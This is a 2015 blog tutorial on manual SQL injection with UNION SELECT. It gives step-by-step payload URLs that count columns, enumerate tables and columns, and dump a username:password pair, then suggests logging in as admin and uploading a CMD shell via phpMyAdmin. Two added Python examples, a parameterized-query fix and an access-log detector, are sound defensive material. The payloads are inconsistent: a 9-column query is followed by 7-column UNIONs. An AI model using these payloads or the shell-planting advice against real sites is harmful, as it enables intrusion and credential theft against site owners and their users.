By: Kevin Mark
August 11, 2015
Guide: How to Manually Perform SQL Injection with UNION SELECT
Our target today is: https://target.com/index.php?id=5
We want to find out whether our target is vulnerable to SQL injection. Let's check if any MySQL errors come up when we add a single quote ( ' ) to the parameter: https://target.com/index.php?id=5... And it did!
You have an error in your SQL syntax; check the manual that corresponds to your.....
So, it's time to make sure we can actually work this the way we want. We're going to work with ORDER BY: it helps us find out how many columns the query returns. Let's start by adding ORDER BY 5 and see whether the page still looks normal or an error comes up from asking for more columns than exist.
- https://target.com/index.php?id=5 ORDER BY 5-- (it still looks all normal here; let's increase the number by 5 more.)
- https://target.com/index.php?id=5 ORDER BY 10-- (oops, something happened here; it comes up with this error...)
Unknown column '10' in 'order clause'
Alright, so instead of 10 we try 9-- and the error disappears. Now we know there are 9 columns on our target. Since we know the column count, it's time to take the next step: finding out which column we can inject into. For that, we're going to work with UNION SELECT.
- https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9-- (Some numbers come up on the page, which makes this easy: most are shown normally, and the one that's different, shown in bold, is the column we can use.)
53
We know the column we're going to work with here is 5. So, let's inject it now by doing the following:
- https://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(table_name),6,7 from information_schema.tables
CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS
You will see much more than this, and it will differ from what's shown here, but one thing is one hundred percent certain: you're in. Now we want to go even further and see the valuable stuff. To get something we can actually work with, we type:
- http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_schema=database()--
ID,USERNAME,LIST,PASSWORD,MAIL,LINKS,.......
And, if it's even worse, PHPMYADMIN, MYSQL, CREDITCARDS, PSN and such can be there too. It's a very dangerous situation for the target. We have now decided that we want the USERNAME:PASSWORD pairs from our target.
- http://target.com/index.php?id=-5 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7 from database--
administrator:badsecurity
This target stores the password in plaintext; oops, so dumb! In other situations you'll normally see the password as an MD5 hash, and some are encrypted. We now have the username:password. Let's find the administration login and use it. If the target has PHPMYADMIN, it's just a matter of finding the PHPMYADMIN panel. From there you can do something very dangerous too, by adding a CMD shell, and then upload another shell with more features.
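The whole walkthrough works only because index.php splices the id value straight into the SQL text. The following is an added example, not code from the post or from any real index.php: it rebuilds the bug and its fix in Python against an in-memory SQLite database (an assumed stand-in for the MySQL backend; SQLite has no information_schema, so the last probe reads a constructed users table directly, as the post's final step does). The same probe values the post walks through are run through a vulnerable lookup and a hardened one, so the reader can see that type validation plus a bound parameter turns every probe into a rejected request instead of an error or a leaked row. The schema, table names and the three-column query are assumptions; the post's own query has 9 columns.

```python
import sqlite3

# Constructed in-memory schema standing in for the MySQL database behind
# index.php in the post (an assumption; the post never shows the real schema).
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO products VALUES (5, 'widget', 9.99);
INSERT INTO users VALUES (1, 'administrator', 'badsecurity');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, product_id):
    """The bug the post exploits: the query-string value is spliced into SQL text."""
    sql = "SELECT id, name, price FROM products WHERE id=" + product_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, product_id):
    """Validate the type, then bind the value; the driver never parses it as SQL."""
    pid = int(product_id)  # raises ValueError for anything that is not an integer
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id=?", (pid,)
    ).fetchall()


def probe(conn, lookup, product_id):
    """Run one id value through a lookup and report what the client would observe."""
    try:
        return ("rows", lookup(conn, product_id))
    except sqlite3.Error as exc:
        # Verbose database errors are exactly the signal the post's ORDER BY step relies on.
        return ("sql_error", str(exc))
    except ValueError:
        return ("rejected", None)


# Probe values mirroring the post's steps, scaled to this 3-column query.
PROBES = [
    "5",
    "5 ORDER BY 3--",
    "5 ORDER BY 4--",
    "-5 UNION SELECT 1,2,3--",
    "-5 UNION SELECT 1,group_concat(username||':'||password),3 FROM users--",
]


def compare(product_id):
    """Outcome of the same input against the vulnerable and the hardened lookup."""
    conn = open_db()
    return {
        "vulnerable": probe(conn, lookup_vulnerable, product_id),
        "hardened": probe(conn, lookup_hardened, product_id),
    }


if __name__ == "__main__":
    for p in PROBES:
        print(repr(p), "->", compare(p))
```

Two things the output makes visible: the vulnerable lookup leaks a database error on the out-of-range ORDER BY and returns attacker-chosen rows on the UNION probes, while the hardened lookup returns only the legitimate row for "5" and rejects everything else before any SQL runs. Binding alone (without the int() check) would also be safe here, since a bound string never becomes SQL; the type check additionally keeps malformed ids out of the application's error logs.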
As a little extra, I uploaded a pastebin to show you some additional methods beyond UNION SELECT (not as a tutorial, just an overview).
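Every step in the post leaves a distinctive request in the web server's access log: a bare quote, ORDER BY with an increasing number, UNION SELECT with a run of numbers, and finally information_schema and group_concat. The following is an added example, not part of the post, that scans a constructed sample of Apache-style access log lines for those markers after URL-decoding the request path, and then groups hits by source address so a probe-then-extract sequence stands out from a single stray match. The log lines, addresses and timestamps are constructed for the example; the rule names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (not from the post); the first address replays
# the post's probe sequence, the second makes ordinary requests.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Aug/2015:10:01:02 +0000] "GET /index.php?id=5 HTTP/1.1" 200 4312
203.0.113.7 - - [11/Aug/2015:10:01:09 +0000] "GET /index.php?id=5%27 HTTP/1.1" 500 211
203.0.113.7 - - [11/Aug/2015:10:01:15 +0000] "GET /index.php?id=5%20ORDER%20BY%2010-- HTTP/1.1" 500 218
203.0.113.7 - - [11/Aug/2015:10:01:21 +0000] "GET /index.php?id=5%20ORDER%20BY%209-- HTTP/1.1" 200 4312
203.0.113.7 - - [11/Aug/2015:10:01:40 +0000] "GET /index.php?id=-5%20UNION%20SELECT%201,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 4390
203.0.113.7 - - [11/Aug/2015:10:02:03 +0000] "GET /index.php?id=-5%20UNION%20SELECT%201,2,3,4,group_concat(table_name),6,7%20from%20information_schema.tables HTTP/1.1" 200 9120
198.51.100.4 - - [11/Aug/2015:10:02:10 +0000] "GET /index.php?id=7 HTTP/1.1" 200 4301
198.51.100.4 - - [11/Aug/2015:10:02:12 +0000] "GET /search.php?q=order%20by%20mail HTTP/1.1" 200 1800
"""

# Common log format: ip ident user [timestamp] "method path protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule matches one stage of the post's walkthrough (rule names are assumed).
RULES = [
    ("quote_probe", re.compile(r"'")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),   # ORDER BY <number>
    ("union_select", re.compile(r"\bunion\b.{0,20}\bselect\b", re.I)),
    ("information_schema", re.compile(r"information_schema\.", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
]


def parse_line(line):
    """Split one access-log line into fields; None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def scan_log(text):
    """Return one hit per request whose decoded path triggers at least one rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        # Decode %27 / %20 so the rules see what the database saw.
        decoded = unquote_plus(rec["path"])
        rules = [name for name, rx in RULES if rx.search(decoded)]
        if rules:
            hits.append({"line": n, "ip": rec["ip"], "status": rec["status"], "rules": rules})
    return hits


def escalation_ips(hits, min_rules=2):
    """Source addresses whose requests triggered several distinct rules:
    a probe-then-extract sequence rather than a one-off false positive."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["ip"], set()).update(h["rules"])
    return sorted(ip for ip, rules in by_ip.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(h)
    print("escalating sources:", escalation_ips(found))
```

The ORDER BY rule requires a trailing number, so the legitimate search for "order by mail" on the last line is not flagged; only the first address, which trips five distinct rules in sequence, is reported as escalating. The HTTP 500 responses alongside the quote and ORDER BY 10 requests are the server-side counterpart of the error messages the post reads off the page, and are worth alerting on by themselves.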